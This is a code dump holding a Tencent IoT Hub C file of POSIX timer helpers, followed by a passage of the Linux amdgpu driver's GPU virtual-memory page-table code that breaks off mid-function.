/* * Tencent is pleased to support the open source community by making IoT Hub available. * Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved. * Licensed under the MIT License (the "License"); you may not use this file except in * compliance with the License. You may obtain a copy of the License at * http://opensource.org/licenses/MIT * Unless required by applicable law or agreed to in writing, software distributed under the License is * distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, * either express or implied. See the License for the specific language governing permissions and * limitations under the License. * */ #ifdef __cplusplus extern "C" { #endif #include <time.h> #include <sys/time.h> #include "qcloud_iot_import.h" static char now_time_str[20] = {0}; bool HAL_Timer_expired(Timer *timer) { struct timeval now, res; gettimeofday(&now, NULL); timersub(&timer->end_time, &now, &res); return res.tv_sec < 0 || (res.tv_sec == 0 && res.tv_usec <= 0); } void HAL_Timer_countdown_ms(Timer *timer, unsigned int timeout_ms) { struct timeval now; gettimeofday(&now, NULL); struct timeval interval = {timeout_ms / 1000, (timeout_ms % 1000) * 1000}; timeradd(&now, &interval, &timer->end_time); } void HAL_Timer_countdown(Timer *timer, unsigned int timeout) { struct timeval now; gettimeofday(&now, NULL); struct timeval interval = {timeout, 0}; timeradd(&now, &interval, &timer->end_time); } int HAL_Timer_remain(Timer *timer) { struct timeval now, res; gettimeofday(&now, NULL); timersub(&timer->end_time, &now, &res); return (res.tv_sec < 0) ? 0 : res.tv_sec * 1000 + res.tv_usec / 1000; } void HAL_Timer_init(Timer *timer) { timer->end_time = (struct timeval) {0, 0}; } char* HAL_Timer_current(void) { struct timeval tv; gettimeofday(&tv, NULL); time_t now_time = tv.tv_sec; struct tm tm_tmp = *localtime(&now_time); strftime(now_time_str, 20, "%F %T", &tm_tmp); return now_time_str; } long HAL_Timer_current_sec(void) { struct timeval tv; gettimeofday(&tv, NULL); return tv.tv_sec; } #ifdef __cplusplus } #endif
352972.c
/* * Copyright 2008 Advanced Micro Devices, Inc. * Copyright 2008 Red Hat Inc. * Copyright 2009 Jerome Glisse. * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. * * Authors: Dave Airlie * Alex Deucher * Jerome Glisse */ #include <linux/dma-fence-array.h> #include <linux/interval_tree_generic.h> #include <linux/idr.h> #include <drm/drmP.h> #include <drm/amdgpu_drm.h> #include "amdgpu.h" #include "amdgpu_trace.h" #include "amdgpu_amdkfd.h" /* * GPUVM * GPUVM is similar to the legacy gart on older asics, however * rather than there being a single global gart table * for the entire GPU, there are multiple VM page tables active * at any given time. The VM page tables can contain a mix * vram pages and system memory pages and system memory pages * can be mapped as snooped (cached system pages) or unsnooped * (uncached system pages). * Each VM has an ID associated with it and there is a page table * associated with each VMID. When execting a command buffer, * the kernel tells the the ring what VMID to use for that command * buffer. VMIDs are allocated dynamically as commands are submitted. * The userspace drivers maintain their own address space and the kernel * sets up their pages tables accordingly when they submit their * command buffers and a VMID is assigned. * Cayman/Trinity support up to 8 active VMs at any given time; * SI supports 16. */ #define START(node) ((node)->start) #define LAST(node) ((node)->last) INTERVAL_TREE_DEFINE(struct amdgpu_bo_va_mapping, rb, uint64_t, __subtree_last, START, LAST, static, amdgpu_vm_it) #undef START #undef LAST /* Local structure. Encapsulate some VM table update parameters to reduce * the number of function parameters */ struct amdgpu_pte_update_params { /* amdgpu device we do this update for */ struct amdgpu_device *adev; /* optional amdgpu_vm we do this update for */ struct amdgpu_vm *vm; /* address where to copy page table entries from */ uint64_t src; /* indirect buffer to fill with commands */ struct amdgpu_ib *ib; /* Function which actually does the update */ void (*func)(struct amdgpu_pte_update_params *params, struct amdgpu_bo *bo, uint64_t pe, uint64_t addr, unsigned count, uint32_t incr, uint64_t flags); /* The next two are used during VM update by CPU * DMA addresses to use for mapping * Kernel pointer of PD/PT BO that needs to be updated */ dma_addr_t *pages_addr; void *kptr; }; /* Helper to disable partial resident texture feature from a fence callback */ struct amdgpu_prt_cb { struct amdgpu_device *adev; struct dma_fence_cb cb; }; /** * amdgpu_vm_level_shift - return the addr shift for each level * * @adev: amdgpu_device pointer * * Returns the number of bits the pfn needs to be right shifted for a level. */ static unsigned amdgpu_vm_level_shift(struct amdgpu_device *adev, unsigned level) { unsigned shift = 0xff; switch (level) { case AMDGPU_VM_PDB2: case AMDGPU_VM_PDB1: case AMDGPU_VM_PDB0: shift = 9 * (AMDGPU_VM_PDB0 - level) + adev->vm_manager.block_size; break; case AMDGPU_VM_PTB: shift = 0; break; default: dev_err(adev->dev, "the level%d isn't supported.\n", level); } return shift; } /** * amdgpu_vm_num_entries - return the number of entries in a PD/PT * * @adev: amdgpu_device pointer * * Calculate the number of entries in a page directory or page table. */ static unsigned amdgpu_vm_num_entries(struct amdgpu_device *adev, unsigned level) { unsigned shift = amdgpu_vm_level_shift(adev, adev->vm_manager.root_level); if (level == adev->vm_manager.root_level) /* For the root directory */ return round_up(adev->vm_manager.max_pfn, 1 << shift) >> shift; else if (level != AMDGPU_VM_PTB) /* Everything in between */ return 512; else /* For the page tables on the leaves */ return AMDGPU_VM_PTE_COUNT(adev); } /** * amdgpu_vm_bo_size - returns the size of the BOs in bytes * * @adev: amdgpu_device pointer * * Calculate the size of the BO for a page directory or page table in bytes. */ static unsigned amdgpu_vm_bo_size(struct amdgpu_device *adev, unsigned level) { return AMDGPU_GPU_PAGE_ALIGN(amdgpu_vm_num_entries(adev, level) * 8); } /** * amdgpu_vm_get_pd_bo - add the VM PD to a validation list * * @vm: vm providing the BOs * @validated: head of validation list * @entry: entry to add * * Add the page directory to the list of BOs to * validate for command submission. */ void amdgpu_vm_get_pd_bo(struct amdgpu_vm *vm, struct list_head *validated, struct amdgpu_bo_list_entry *entry) { entry->robj = vm->root.base.bo; entry->priority = 0; entry->tv.bo = &entry->robj->tbo; entry->tv.shared = true; entry->user_pages = NULL; list_add(&entry->tv.head, validated); } /** * amdgpu_vm_validate_pt_bos - validate the page table BOs * * @adev: amdgpu device pointer * @vm: vm providing the BOs * @validate: callback to do the validation * @param: parameter for the validation callback * * Validate the page table BOs on command submission if neccessary. */ int amdgpu_vm_validate_pt_bos(struct amdgpu_device *adev, struct amdgpu_vm *vm, int (*validate)(void *p, struct amdgpu_bo *bo), void *param) { struct ttm_bo_global *glob = adev->mman.bdev.glob; int r; spin_lock(&vm->status_lock); while (!list_empty(&vm->evicted)) { struct amdgpu_vm_bo_base *bo_base; struct amdgpu_bo *bo; bo_base = list_first_entry(&vm->evicted, struct amdgpu_vm_bo_base, vm_status); spin_unlock(&vm->status_lock); bo = bo_base->bo; BUG_ON(!bo); if (bo->parent) { r = validate(param, bo); if (r) return r; spin_lock(&glob->lru_lock); ttm_bo_move_to_lru_tail(&bo->tbo); if (bo->shadow) ttm_bo_move_to_lru_tail(&bo->shadow->tbo); spin_unlock(&glob->lru_lock); } if (bo->tbo.type == ttm_bo_type_kernel && vm->use_cpu_for_update) { r = amdgpu_bo_kmap(bo, NULL); if (r) return r; } spin_lock(&vm->status_lock); if (bo->tbo.type != ttm_bo_type_kernel) list_move(&bo_base->vm_status, &vm->moved); else list_move(&bo_base->vm_status, &vm->relocated); } spin_unlock(&vm->status_lock); return 0; } /** * amdgpu_vm_ready - check VM is ready for updates * * @vm: VM to check * * Check if all VM PDs/PTs are ready for updates */ bool amdgpu_vm_ready(struct amdgpu_vm *vm) { bool ready; spin_lock(&vm->status_lock); ready = list_empty(&vm->evicted); spin_unlock(&vm->status_lock); return ready; } /** * amdgpu_vm_clear_bo - initially clear the PDs/PTs * * @adev: amdgpu_device pointer * @bo: BO to clear * @level: level this BO is at * * Root PD needs to be reserved when calling this. */ static int amdgpu_vm_clear_bo(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_bo *bo, unsigned level, bool pte_support_ats) { struct ttm_operation_ctx ctx = { true, false }; struct dma_fence *fence = NULL; unsigned entries, ats_entries; struct amdgpu_ring *ring; struct amdgpu_job *job; uint64_t addr; int r; addr = amdgpu_bo_gpu_offset(bo); entries = amdgpu_bo_size(bo) / 8; if (pte_support_ats) { if (level == adev->vm_manager.root_level) { ats_entries = amdgpu_vm_level_shift(adev, level); ats_entries += AMDGPU_GPU_PAGE_SHIFT; ats_entries = AMDGPU_VA_HOLE_START >> ats_entries; ats_entries = min(ats_entries, entries); entries -= ats_entries; } else { ats_entries = entries; entries = 0; } } else { ats_entries = 0; } ring = container_of(vm->entity.sched, struct amdgpu_ring, sched); r = reservation_object_reserve_shared(bo->tbo.resv); if (r) return r; r = ttm_bo_validate(&bo->tbo, &bo->placement, &ctx); if (r) goto error; r = amdgpu_job_alloc_with_ib(adev, 64, &job); if (r) goto error; if (ats_entries) { uint64_t ats_value; ats_value = AMDGPU_PTE_DEFAULT_ATC; if (level != AMDGPU_VM_PTB) ats_value |= AMDGPU_PDE_PTE; amdgpu_vm_set_pte_pde(adev, &job->ibs[0], addr, 0, ats_entries, 0, ats_value); addr += ats_entries * 8; } if (entries) amdgpu_vm_set_pte_pde(adev, &job->ibs[0], addr, 0, entries, 0, 0); amdgpu_ring_pad_ib(ring, &job->ibs[0]); WARN_ON(job->ibs[0].length_dw > 64); r = amdgpu_sync_resv(adev, &job->sync, bo->tbo.resv, AMDGPU_FENCE_OWNER_UNDEFINED, false); if (r) goto error_free; r = amdgpu_job_submit(job, ring, &vm->entity, AMDGPU_FENCE_OWNER_UNDEFINED, &fence); if (r) goto error_free; amdgpu_bo_fence(bo, fence, true); dma_fence_put(fence); if (bo->shadow) return amdgpu_vm_clear_bo(adev, vm, bo->shadow, level, pte_support_ats); return 0; error_free: amdgpu_job_free(job); error: return r; } /** * amdgpu_vm_alloc_levels - allocate the PD/PT levels * * @adev: amdgpu_device pointer * @vm: requested vm * @saddr: start of the address range * @eaddr: end of the address range * * Make sure the page directories and page tables are allocated */ static int amdgpu_vm_alloc_levels(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_vm_pt *parent, uint64_t saddr, uint64_t eaddr, unsigned level, bool ats) { unsigned shift = amdgpu_vm_level_shift(adev, level); unsigned pt_idx, from, to; u64 flags; int r; if (!parent->entries) { unsigned num_entries = amdgpu_vm_num_entries(adev, level); parent->entries = kvmalloc_array(num_entries, sizeof(struct amdgpu_vm_pt), GFP_KERNEL | __GFP_ZERO); if (!parent->entries) return -ENOMEM; memset(parent->entries, 0 , sizeof(struct amdgpu_vm_pt)); } from = saddr >> shift; to = eaddr >> shift; if (from >= amdgpu_vm_num_entries(adev, level) || to >= amdgpu_vm_num_entries(adev, level)) return -EINVAL; ++level; saddr = saddr & ((1 << shift) - 1); eaddr = eaddr & ((1 << shift) - 1); flags = AMDGPU_GEM_CREATE_VRAM_CONTIGUOUS; if (vm->use_cpu_for_update) flags |= AMDGPU_GEM_CREATE_CPU_ACCESS_REQUIRED; else flags |= (AMDGPU_GEM_CREATE_NO_CPU_ACCESS | AMDGPU_GEM_CREATE_SHADOW); /* walk over the address space and allocate the page tables */ for (pt_idx = from; pt_idx <= to; ++pt_idx) { struct reservation_object *resv = vm->root.base.bo->tbo.resv; struct amdgpu_vm_pt *entry = &parent->entries[pt_idx]; struct amdgpu_bo *pt; if (!entry->base.bo) { r = amdgpu_bo_create(adev, amdgpu_vm_bo_size(adev, level), AMDGPU_GPU_PAGE_SIZE, AMDGPU_GEM_DOMAIN_VRAM, flags, ttm_bo_type_kernel, resv, &pt); if (r) return r; r = amdgpu_vm_clear_bo(adev, vm, pt, level, ats); if (r) { amdgpu_bo_unref(&pt->shadow); amdgpu_bo_unref(&pt); return r; } if (vm->use_cpu_for_update) { r = amdgpu_bo_kmap(pt, NULL); if (r) { amdgpu_bo_unref(&pt->shadow); amdgpu_bo_unref(&pt); return r; } } /* Keep a reference to the root directory to avoid * freeing them up in the wrong order. */ pt->parent = amdgpu_bo_ref(parent->base.bo); entry->base.vm = vm; entry->base.bo = pt; list_add_tail(&entry->base.bo_list, &pt->va); spin_lock(&vm->status_lock); list_add(&entry->base.vm_status, &vm->relocated); spin_unlock(&vm->status_lock); } if (level < AMDGPU_VM_PTB) { uint64_t sub_saddr = (pt_idx == from) ? saddr : 0; uint64_t sub_eaddr = (pt_idx == to) ? eaddr : ((1 << shift) - 1); r = amdgpu_vm_alloc_levels(adev, vm, entry, sub_saddr, sub_eaddr, level, ats); if (r) return r; } } return 0; } /** * amdgpu_vm_alloc_pts - Allocate page tables. * * @adev: amdgpu_device pointer * @vm: VM to allocate page tables for * @saddr: Start address which needs to be allocated * @size: Size from start address we need. * * Make sure the page tables are allocated. */ int amdgpu_vm_alloc_pts(struct amdgpu_device *adev, struct amdgpu_vm *vm, uint64_t saddr, uint64_t size) { uint64_t eaddr; bool ats = false; /* validate the parameters */ if (saddr & AMDGPU_GPU_PAGE_MASK || size & AMDGPU_GPU_PAGE_MASK) return -EINVAL; eaddr = saddr + size - 1; if (vm->pte_support_ats) ats = saddr < AMDGPU_VA_HOLE_START; saddr /= AMDGPU_GPU_PAGE_SIZE; eaddr /= AMDGPU_GPU_PAGE_SIZE; if (eaddr >= adev->vm_manager.max_pfn) { dev_err(adev->dev, "va above limit (0x%08llX >= 0x%08llX)\n", eaddr, adev->vm_manager.max_pfn); return -EINVAL; } return amdgpu_vm_alloc_levels(adev, vm, &vm->root, saddr, eaddr, adev->vm_manager.root_level, ats); } /** * amdgpu_vm_check_compute_bug - check whether asic has compute vm bug * * @adev: amdgpu_device pointer */ void amdgpu_vm_check_compute_bug(struct amdgpu_device *adev) { const struct amdgpu_ip_block *ip_block; bool has_compute_vm_bug; struct amdgpu_ring *ring; int i; has_compute_vm_bug = false; ip_block = amdgpu_device_ip_get_ip_block(adev, AMD_IP_BLOCK_TYPE_GFX); if (ip_block) { /* Compute has a VM bug for GFX version < 7. Compute has a VM bug for GFX 8 MEC firmware version < 673.*/ if (ip_block->version->major <= 7) has_compute_vm_bug = true; else if (ip_block->version->major == 8) if (adev->gfx.mec_fw_version < 673) has_compute_vm_bug = true; } for (i = 0; i < adev->num_rings; i++) { ring = adev->rings[i]; if (ring->funcs->type == AMDGPU_RING_TYPE_COMPUTE) /* only compute rings */ ring->has_compute_vm_bug = has_compute_vm_bug; else ring->has_compute_vm_bug = false; } } bool amdgpu_vm_need_pipeline_sync(struct amdgpu_ring *ring, struct amdgpu_job *job) { struct amdgpu_device *adev = ring->adev; unsigned vmhub = ring->funcs->vmhub; struct amdgpu_vmid_mgr *id_mgr = &adev->vm_manager.id_mgr[vmhub]; struct amdgpu_vmid *id; bool gds_switch_needed; bool vm_flush_needed = job->vm_needs_flush || ring->has_compute_vm_bug; if (job->vmid == 0) return false; id = &id_mgr->ids[job->vmid]; gds_switch_needed = ring->funcs->emit_gds_switch && ( id->gds_base != job->gds_base || id->gds_size != job->gds_size || id->gws_base != job->gws_base || id->gws_size != job->gws_size || id->oa_base != job->oa_base || id->oa_size != job->oa_size); if (amdgpu_vmid_had_gpu_reset(adev, id)) return true; return vm_flush_needed || gds_switch_needed; } static bool amdgpu_vm_is_large_bar(struct amdgpu_device *adev) { return (adev->gmc.real_vram_size == adev->gmc.visible_vram_size); } /** * amdgpu_vm_flush - hardware flush the vm * * @ring: ring to use for flush * @vmid: vmid number to use * @pd_addr: address of the page directory * * Emit a VM flush when it is necessary. */ int amdgpu_vm_flush(struct amdgpu_ring *ring, struct amdgpu_job *job, bool need_pipe_sync) { struct amdgpu_device *adev = ring->adev; unsigned vmhub = ring->funcs->vmhub; struct amdgpu_vmid_mgr *id_mgr = &adev->vm_manager.id_mgr[vmhub]; struct amdgpu_vmid *id = &id_mgr->ids[job->vmid]; bool gds_switch_needed = ring->funcs->emit_gds_switch && ( id->gds_base != job->gds_base || id->gds_size != job->gds_size || id->gws_base != job->gws_base || id->gws_size != job->gws_size || id->oa_base != job->oa_base || id->oa_size != job->oa_size); bool vm_flush_needed = job->vm_needs_flush; bool pasid_mapping_needed = id->pasid != job->pasid || !id->pasid_mapping || !dma_fence_is_signaled(id->pasid_mapping); struct dma_fence *fence = NULL; unsigned patch_offset = 0; int r; if (amdgpu_vmid_had_gpu_reset(adev, id)) { gds_switch_needed = true; vm_flush_needed = true; pasid_mapping_needed = true; } gds_switch_needed &= !!ring->funcs->emit_gds_switch; vm_flush_needed &= !!ring->funcs->emit_vm_flush; pasid_mapping_needed &= adev->gmc.gmc_funcs->emit_pasid_mapping && ring->funcs->emit_wreg; if (!vm_flush_needed && !gds_switch_needed && !need_pipe_sync) return 0; if (ring->funcs->init_cond_exec) patch_offset = amdgpu_ring_init_cond_exec(ring); if (need_pipe_sync) amdgpu_ring_emit_pipeline_sync(ring); if (vm_flush_needed) { trace_amdgpu_vm_flush(ring, job->vmid, job->vm_pd_addr); amdgpu_ring_emit_vm_flush(ring, job->vmid, job->vm_pd_addr); } if (pasid_mapping_needed) amdgpu_gmc_emit_pasid_mapping(ring, job->vmid, job->pasid); if (vm_flush_needed || pasid_mapping_needed) { r = amdgpu_fence_emit(ring, &fence); if (r) return r; } if (vm_flush_needed) { mutex_lock(&id_mgr->lock); dma_fence_put(id->last_flush); id->last_flush = dma_fence_get(fence); id->current_gpu_reset_count = atomic_read(&adev->gpu_reset_counter); mutex_unlock(&id_mgr->lock); } if (pasid_mapping_needed) { id->pasid = job->pasid; dma_fence_put(id->pasid_mapping); id->pasid_mapping = dma_fence_get(fence); } dma_fence_put(fence); if (ring->funcs->emit_gds_switch && gds_switch_needed) { id->gds_base = job->gds_base; id->gds_size = job->gds_size; id->gws_base = job->gws_base; id->gws_size = job->gws_size; id->oa_base = job->oa_base; id->oa_size = job->oa_size; amdgpu_ring_emit_gds_switch(ring, job->vmid, job->gds_base, job->gds_size, job->gws_base, job->gws_size, job->oa_base, job->oa_size); } if (ring->funcs->patch_cond_exec) amdgpu_ring_patch_cond_exec(ring, patch_offset); /* the double SWITCH_BUFFER here *cannot* be skipped by COND_EXEC */ if (ring->funcs->emit_switch_buffer) { amdgpu_ring_emit_switch_buffer(ring); amdgpu_ring_emit_switch_buffer(ring); } return 0; } /** * amdgpu_vm_bo_find - find the bo_va for a specific vm & bo * * @vm: requested vm * @bo: requested buffer object * * Find @bo inside the requested vm. * Search inside the @bos vm list for the requested vm * Returns the found bo_va or NULL if none is found * * Object has to be reserved! */ struct amdgpu_bo_va *amdgpu_vm_bo_find(struct amdgpu_vm *vm, struct amdgpu_bo *bo) { struct amdgpu_bo_va *bo_va; list_for_each_entry(bo_va, &bo->va, base.bo_list) { if (bo_va->base.vm == vm) { return bo_va; } } return NULL; } /** * amdgpu_vm_do_set_ptes - helper to call the right asic function * * @params: see amdgpu_pte_update_params definition * @bo: PD/PT to update * @pe: addr of the page entry * @addr: dst addr to write into pe * @count: number of page entries to update * @incr: increase next addr by incr bytes * @flags: hw access flags * * Traces the parameters and calls the right asic functions * to setup the page table using the DMA. */ static void amdgpu_vm_do_set_ptes(struct amdgpu_pte_update_params *params, struct amdgpu_bo *bo, uint64_t pe, uint64_t addr, unsigned count, uint32_t incr, uint64_t flags) { pe += amdgpu_bo_gpu_offset(bo); trace_amdgpu_vm_set_ptes(pe, addr, count, incr, flags); if (count < 3) { amdgpu_vm_write_pte(params->adev, params->ib, pe, addr | flags, count, incr); } else { amdgpu_vm_set_pte_pde(params->adev, params->ib, pe, addr, count, incr, flags); } } /** * amdgpu_vm_do_copy_ptes - copy the PTEs from the GART * * @params: see amdgpu_pte_update_params definition * @bo: PD/PT to update * @pe: addr of the page entry * @addr: dst addr to write into pe * @count: number of page entries to update * @incr: increase next addr by incr bytes * @flags: hw access flags * * Traces the parameters and calls the DMA function to copy the PTEs. */ static void amdgpu_vm_do_copy_ptes(struct amdgpu_pte_update_params *params, struct amdgpu_bo *bo, uint64_t pe, uint64_t addr, unsigned count, uint32_t incr, uint64_t flags) { uint64_t src = (params->src + (addr >> 12) * 8); pe += amdgpu_bo_gpu_offset(bo); trace_amdgpu_vm_copy_ptes(pe, src, count); amdgpu_vm_copy_pte(params->adev, params->ib, pe, src, count); } /** * amdgpu_vm_map_gart - Resolve gart mapping of addr * * @pages_addr: optional DMA address to use for lookup * @addr: the unmapped addr * * Look up the physical address of the page that the pte resolves * to and return the pointer for the page table entry. */ static uint64_t amdgpu_vm_map_gart(const dma_addr_t *pages_addr, uint64_t addr) { uint64_t result; /* page table offset */ result = pages_addr[addr >> PAGE_SHIFT]; /* in case cpu page size != gpu page size*/ result |= addr & (~PAGE_MASK); result &= 0xFFFFFFFFFFFFF000ULL; return result; } /** * amdgpu_vm_cpu_set_ptes - helper to update page tables via CPU * * @params: see amdgpu_pte_update_params definition * @bo: PD/PT to update * @pe: kmap addr of the page entry * @addr: dst addr to write into pe * @count: number of page entries to update * @incr: increase next addr by incr bytes * @flags: hw access flags * * Write count number of PT/PD entries directly. */ static void amdgpu_vm_cpu_set_ptes(struct amdgpu_pte_update_params *params, struct amdgpu_bo *bo, uint64_t pe, uint64_t addr, unsigned count, uint32_t incr, uint64_t flags) { unsigned int i; uint64_t value; pe += (unsigned long)amdgpu_bo_kptr(bo); trace_amdgpu_vm_set_ptes(pe, addr, count, incr, flags); for (i = 0; i < count; i++) { value = params->pages_addr ? amdgpu_vm_map_gart(params->pages_addr, addr) : addr; amdgpu_gmc_set_pte_pde(params->adev, (void *)(uintptr_t)pe, i, value, flags); addr += incr; } } static int amdgpu_vm_wait_pd(struct amdgpu_device *adev, struct amdgpu_vm *vm, void *owner) { struct amdgpu_sync sync; int r; amdgpu_sync_create(&sync); amdgpu_sync_resv(adev, &sync, vm->root.base.bo->tbo.resv, owner, false); r = amdgpu_sync_wait(&sync, true); amdgpu_sync_free(&sync); return r; } /* * amdgpu_vm_update_pde - update a single level in the hierarchy * * @param: parameters for the update * @vm: requested vm * @parent: parent directory * @entry: entry to update * * Makes sure the requested entry in parent is up to date. */ static void amdgpu_vm_update_pde(struct amdgpu_pte_update_params *params, struct amdgpu_vm *vm, struct amdgpu_vm_pt *parent, struct amdgpu_vm_pt *entry) { struct amdgpu_bo *bo = parent->base.bo, *pbo; uint64_t pde, pt, flags; unsigned level; /* Don't update huge pages here */ if (entry->huge) return; for (level = 0, pbo = bo->parent; pbo; ++level) pbo = pbo->parent; level += params->adev->vm_manager.root_level; pt = amdgpu_bo_gpu_offset(entry->base.bo); flags = AMDGPU_PTE_VALID; amdgpu_gmc_get_vm_pde(params->adev, level, &pt, &flags); pde = (entry - parent->entries) * 8; if (bo->shadow) params->func(params, bo->shadow, pde, pt, 1, 0, flags); params->func(params, bo, pde, pt, 1, 0, flags); } /* * amdgpu_vm_invalidate_level - mark all PD levels as invalid * * @parent: parent PD * * Mark all PD level as invalid after an error. */ static void amdgpu_vm_invalidate_level(struct amdgpu_device *adev, struct amdgpu_vm *vm, struct amdgpu_vm_pt *parent, unsigned level) { unsigned pt_idx, num_entries; /* * Recurse into the subdirectories. This recursion is harmless because * we only have a maximum of 5 layers. */ num_entries = amdgpu_vm_num_entries(adev, level); for (pt_idx = 0; pt_idx < num_entries; ++pt_idx) { struct amdgpu_vm_pt *entry = &parent->entries[pt_idx]; if (!entry->base.bo) continue; spin_lock(&vm->status_lock); if (list_empty(&entry->base.vm_status)) list_add(&entry->base.vm_status, &vm->relocated); spin_unlock(&vm->status_lock); amdgpu_vm_invalidate_level(adev, vm, entry, level + 1); } } /* * amdgpu_vm_update_directories - make sure that all directories are valid * * @adev: amdgpu_device pointer * @vm: requested vm * * Makes sure all directories are up to date. * Returns 0 for success, error for failure. */ int amdgpu_vm_update_directories(struct amdgpu_device *adev, struct amdgpu_vm *vm) { struct amdgpu_pte_update_params params; struct amdgpu_job *job; unsigned ndw = 0; int r = 0; if (list_empty(&vm->relocated)) return 0; restart: memset(&params, 0, sizeof(params)); params.adev = adev; if (vm->use_cpu_for_update) { r = amdgpu_vm_wait_pd(adev, vm, AMDGPU_FENCE_OWNER_VM); if (unlikely(r)) return r; params.func = amdgpu_vm_cpu_set_ptes; } else { ndw = 512 * 8; r = amdgpu_job_alloc_with_ib(adev, ndw * 4, &job); if (r) return r; params.ib = &job->ibs[0]; params.func = amdgpu_vm_do_set_ptes; } spin_lock(&vm->status_lock); while (!list_empty(&vm->relocated)) { struct amdgpu_vm_bo_base *bo_base, *parent; struct amdgpu_vm_pt *pt, *entry; struct amdgpu_bo *bo; bo_base = list_first_entry(&vm->relocated, struct amdgpu_vm_bo_base, vm_status); list_del_init(&bo_base->vm_status); spin_unlock(&vm->status_lock); bo = bo_base->bo->parent; if (!bo) { spin_lock(&vm->status_lock); continue; } parent = list_first_entry(&bo->va, struct amdgpu_vm_bo_base, bo_list); pt = container_of(parent, struct amdgpu_vm_pt, base); entry = container_of(bo_base, struct amdgpu_vm_pt, base); amdgpu_vm_update_pde(&params, vm, pt, entry); spin_lock(&vm->status_lock); if (!vm->use_cpu_for_update && (ndw - params.ib->length_dw) < 32) break; } spin_unlock(&vm->status_lock); if (vm->use_cpu_for_update) { /* Flush HDP */ mb(); amdgpu_asic_flush_hdp(adev, NULL); } else if (params.ib->length_dw == 0) { amdgpu_job_free(job); } else { struct amdgpu_bo *root = vm->root.base.bo; struct amdgpu_ring *ring; struct dma_fence *fence; ring = container_of(vm->entity.sched, struct amdgpu_ring, sched); amdgpu_ring_pad_ib(ring, params.ib); amdgpu_sync_resv(adev, &job->sync, root->tbo.resv, AMDGPU_FENCE_OWNER_VM, false); WARN_ON(params.ib->length_dw > ndw); r = amdgpu_job_submit(job, ring, &vm->entity, AMDGPU_FENCE_OWNER_VM, &fence); if (r) goto error; amdgpu_bo_fence(root, fence, true); dma_fence_put(vm->last_update); vm->last_update = fence; } if (!list_empty(&vm->relocated)) goto restart; return 0; error: amdgpu_vm_invalidate_level(adev, vm, &vm->root, adev->vm_manager.root_level); amdgpu_job_free(job); return r; } /** * amdgpu_vm_find_entry - find the entry for an address * * @p: see amdgpu_pte_update_params definition * @addr: virtual address in question * @entry: resulting entry or NULL * @parent: parent entry * * Find the vm_pt entry and it's parent for the given address. */ void amdgpu_vm_get_entry(struct amdgpu_pte_update_params *p, uint64_t addr, struct amdgpu_vm_pt **entry, struct amdgpu_vm_pt **parent) { unsigned level = p->adev->vm_manager.root_level; *parent = NULL; *entry = &p->vm->root; while ((*entry)->entries) { unsigned shift = amdgpu_vm_level_shift(p->adev, level++); *parent = *entry; *entry = &(*entry)->entries[addr >> shift]; addr &= (1ULL << shift) - 1; } if (level != AMDGPU_VM_PTB) *entry = NULL; } /** * amdgpu_vm_handle_huge_pages - handle updating the PD with huge pages * * @p: see amdgpu_pte_update_params definition * @entry: vm_pt entry to check * @parent: parent entry * @nptes: number of PTEs updated with this operation * @dst: destination address where the PTEs should point to * @flags: access flags fro the PTEs * * Check if we can update the PD with a huge page. */ static void amdgpu_vm_handle_huge_pages(struct amdgpu_pte_update_params *p, struct amdgpu_vm_pt *entry, struct amdgpu_vm_pt *parent, unsigned nptes, uint64_t dst, uint64_t flags) { uint64_t pde; /* In the case of a mixed PT the PDE must point to it*/ if (p->adev->asic_type >= CHIP_VEGA10 && !p->src && nptes == AMDGPU_VM_PTE_COUNT(p->adev)) { /* Set the huge page flag to stop scanning at this PDE */ flags |= AMDGPU_PDE_PTE; } if (!(flags & AMDGPU_PDE_PTE)) { if (entry->huge) { /* Add the entry to the relocated list to update it. */ entry->huge = false; spin_lock(&p->vm->status_lock); list_move(&entry->base.vm_status, &p->vm->relocated); spin_unlock(&p->vm->status_lock); } return; } entry->huge = true; amdgpu_gmc_get_vm_pde(p->adev, AMDGPU_VM_PDB0, &dst, &flags); pde = (entry - parent->entries) * 8; if (parent->base.bo->shadow) p->func(p, parent->base.bo->shadow, pde, dst, 1, 0, flags); p->func(p, parent->base.bo, pde, dst, 1, 0, flags); } /** * amdgpu_vm_update_ptes - make sure that page tables are valid * * @params: see amdgpu_pte_update_params definition * @vm: requested vm * @start: start of GPU address range * @end: end of GPU address range * @dst: destination address to map to, the next dst inside the function * @flags: mapping flags * * Update the page tables in the range @start - @end. * Returns 0 for success, -EINVAL for failure. */ static int amdgpu_vm_update_ptes(struct amdgpu_pte_update_params *params, uint64_t start, uint64_t end, uint64_t dst, uint64_t flags) { struct amdgpu_device *adev = params->adev; const uint64_t mask = AMDGPU_VM_PTE_COUNT(adev) - 1; uint64_t addr, pe_start; struct amdgpu_bo *pt; unsigned nptes; /* walk over the address space and update the page tables */ for (addr = start; addr < end; addr += nptes, dst += nptes * AMDGPU_GPU_PAGE_SIZE) { struct amdgpu_vm_pt *entry, *parent; amdgpu_vm_get_entry(params, addr, &entry, &parent); if (!entry) return -ENOENT; if ((addr & ~mask) == (end & ~mask)) nptes = end - addr; else nptes = AMDGPU_VM_PTE_COUNT(adev) - (addr & mask); amdgpu_vm_handle_huge_pages(params, entry, parent, nptes, dst, flags); /* We don't need to update PTEs for huge pages */ if (entry->huge) continue; pt = entry->base.bo; pe_start = (addr & mask) * 8; if (pt->shadow) params->func(params, pt->shadow, pe_start, dst, nptes, 